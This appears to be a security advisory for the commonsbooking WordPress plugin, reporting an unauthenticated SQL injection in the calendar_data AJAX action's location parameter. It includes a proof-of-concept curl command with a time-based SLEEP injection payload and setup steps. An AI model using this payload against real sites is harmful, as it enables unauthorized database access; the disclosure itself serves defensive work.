The plugin does not sanitise and escape the location parameter of the calendar_data AJAX action (available to unauthenticated users) before it is used in dynamically constructed SQL queries, leading to an unauthenticated SQL injection
Proof of Concept
Create an "item" and a "location" via the newly added commonsbooking admin menu
Take note of the item id and location id as they may be required for the exploit to work reliably
Invoke the following curl command to trigger a 5 second sleep (via "location" parameter):
curl http://127.0.0.1:8080/wp-admin/admin-ajax.php --data 'action=calendar_data&sd=2099-02-13&ed=2099-02-13&item=1&location=(SELECT 1743 FROM (SELECT(SLEEP(5)))iXxL3)'
+ "sd" and "ed" are dates which should be in the future.
+ "item" should correspond to the item id you created previously (other values may work)
+ "location" is the injection point.